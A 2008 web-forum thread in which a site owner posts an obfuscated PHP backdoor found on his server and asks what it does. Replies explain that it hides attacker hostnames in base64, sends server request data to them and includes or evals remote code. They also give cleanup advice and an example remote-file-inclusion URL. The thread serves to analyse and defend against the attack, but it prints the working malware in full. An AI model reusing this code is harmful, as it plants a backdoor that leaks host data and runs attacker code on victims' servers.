Suchy Posted May 22, 2008 Share Posted May 22, 2008 I found this in a file (174584.php) on my server in a folder that is set to 777, most likely it is some kind of attack. Can you guys help me decode it, what does this attack do and how it works? <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?> Quote Link to comment Share on other sites More sharing options...
phpretard Posted May 22, 2008 Share Posted May 22, 2008 Another FTP attack - your computer is compromised by a malware, your FTP password stolen, and this backdoor uploaded to the server. Check your computer. Quote Link to comment Share on other sites More sharing options...
littledragon Posted May 22, 2008 Share Posted May 22, 2008 include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=" is attempting to include an external file. This is usually done by saving a php file on their own server with the extension gif so that it gets served out as-is and including it from your server.. all this 'base64_decode' is trying to hide the address of their server from you I have some experience of this... you need to change ALL your passwords, including for any other users on your server. Even once you've done that, check all your scripts for security vulnerabilities since people may have been snooping your source code and could take advantage of it. Make sure no files include $include which is set by $include = $_GET['section'] since this can easily be attacked (yoursite.com?section=http://theirsite.com/dodgyinclude.gif), make sure register_globals is off, and keep a close eye on things for a while I was got by a keylogger in an internet cafe in Brasil (I guess, since the attacks I got afterward were in Portuguese) Quote Link to comment Share on other sites More sharing options...
littledragon Posted May 22, 2008 Share Posted May 22, 2008 And oh, yes check your own computer too Quote Link to comment Share on other sites More sharing options...
Suchy Posted May 22, 2008 Author Share Posted May 22, 2008 How can I check it, they won't let me inside the server farm Any way I changed passwords, and deleated the file, what else should I watchout for? PS. thanks for the helpfull responses Quote Link to comment Share on other sites More sharing options...
mlin Posted May 22, 2008 Share Posted May 22, 2008 check your computer means run virus/malware scans to try to get rid of anything you don't want. Advanced users don't usually think they know what an infected system looks like (zero-day exploits, etc...), but if you know what a Clean system should look like...you can catch most garbage manually using hijackThis (ask google) Or, you could Abandon winblows for a better platform debian, ubuntu, and gNewSense all rock. All free of fee, but gNewSense is completely free as in speech. Have a look around. They're all also easy to dual boot so that you can dev on a *nix system, and still have winblows there for your games. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.